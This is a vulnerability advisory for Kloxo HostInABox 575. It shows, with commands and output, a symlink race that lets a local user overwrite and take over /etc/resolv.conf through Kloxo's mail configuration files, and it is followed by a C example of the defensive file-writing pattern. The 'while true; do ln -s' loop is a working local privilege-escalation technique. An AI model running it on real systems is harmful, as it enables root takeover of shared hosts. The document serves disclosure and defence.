Kloxo HostInABox 575 - 2 more symlinks to own any file on the box



DESCRIPTION


Local users could overwrite and take control of any file on the box.



IMPACT


Local users could obtain root privileges.


First, run this command:

[user1@testing574 ~]$ while true ; do ln -s /etc/resolv.conf /home/lxadmin/mail/domains/example.com/postmaster/.bogopref.cf ; done


Next, create a new account in Kloxo for example.com, then observe the result:

[user1@testing574 ~]$ ls -l /etc/resolv.conf
-rw-r--r-- 1 user1 user1 185 May 25 16:29 /etc/resolv.conf
[user1@testing574 ~]$ cat /etc/resolv.conf
spam_cutoff  0.7
spam_subject_tag=******SPAM******
wordlist R,user,postmaster_example_com.wordlist.db,1
wordlist R,system,wordlist.db,2
wordlist R,system,kloxo.wordlist.db,3


This also works for /home/lxadmin/mail/domains/example.com/postmaster/.maildroprc:


[root@testing574 ~]# ls -l /etc/resolv.conf
-rwx------ 1 user1 user1 377 May 26 06:14 /etc/resolv.conf
[root@testing574 ~]# cat /etc/resolv.conf
SHELL=/bin/sh

if ( $SIZE < 96144 )
{
exception  {
xfilter "bogofilter -d /var/bogofilter/ -ep -c /home/lxadmin/mail/domains/example.com/postmaster/.bogopref.cf"
}
}
 if ( /^X-Bogosity: Spam, tests=bogofilter/ )
{
 to /home/lxadmin/mail/domains/example.com/postmaster/Maildir
 }

to /home/lxadmin/mail/domains/example.com/postmaster/Maildir/
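The defender's side of the race above, as an added example that is not Kloxo's own code: the pattern a root-running service should use when it drops a per-account file into a directory the account controls. The file is opened with O_NOFOLLOW, judged through the opened descriptor with fstat rather than by path name, and handed to the account with fchown instead of a later chown on the path. Function names, the temp-dir paths and the sample file contents are constructed for the demonstration; the run_demo() replay needs no root.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Write a per-account config file into a directory that account controls. Returns 0,
 * or -1 if the path is not a plain file we created or the account already owns. */
int write_user_config(const char *path, const char *data, uid_t uid, gid_t gid)
{
    /* O_NOFOLLOW: a planted symlink makes open() fail (ELOOP) instead of being followed
     * into /etc/resolv.conf. O_EXCL tells us whether the file is new or pre-existing. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_NOCTTY, 0600);
    int created = fd >= 0;
    if (!created && (errno != EEXIST ||
                     (fd = open(path, O_WRONLY | O_NOFOLLOW | O_NOCTTY)) < 0))
        return -1;
    struct stat st;
    /* Judge the object actually opened (fstat), not the path name: a check on the
     * name would lose the race against the advisory's "while true; do ln -s" loop. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        (!created && st.st_uid != uid)) {
        close(fd); errno = EPERM; return -1;
    }
    size_t len = strlen(data);
    /* Hand a new file to the account through the descriptor, never chown(path) later. */
    if ((created && (st.st_uid != uid || st.st_gid != gid) && fchown(fd, uid, gid) < 0)
        || ftruncate(fd, 0) < 0 || write(fd, data, len) != (ssize_t)len) {
        close(fd); return -1;
    }
    return close(fd);
}

/* Constructed replay of the advisory's scenario in a temp dir: 0 when the symlink is refused. */
int run_demo(void)
{
    char dir[] = "/tmp/bogopref_demo_XXXXXX", victim[64], link[64];
    if (!mkdtemp(dir)) return 1;
    snprintf(victim, sizeof victim, "%s/resolv.conf", dir);   /* stands in for /etc/resolv.conf */
    snprintf(link, sizeof link, "%s/.bogopref.cf", dir);
    int ok = write_user_config(victim, "nameserver 127.0.0.1\n", getuid(), getgid()) == 0;
    ok = ok && symlink(victim, link) == 0;                      /* the attacker's ln -s */
    ok = ok && write_user_config(link, "spam_cutoff 0.7\n", getuid(), getgid()) < 0;
    struct stat st; ok = ok && stat(victim, &st) == 0 && st.st_size == 21; /* untouched */
    unlink(link); unlink(victim); rmdir(dir);
    return ok ? 0 : 1;
}
```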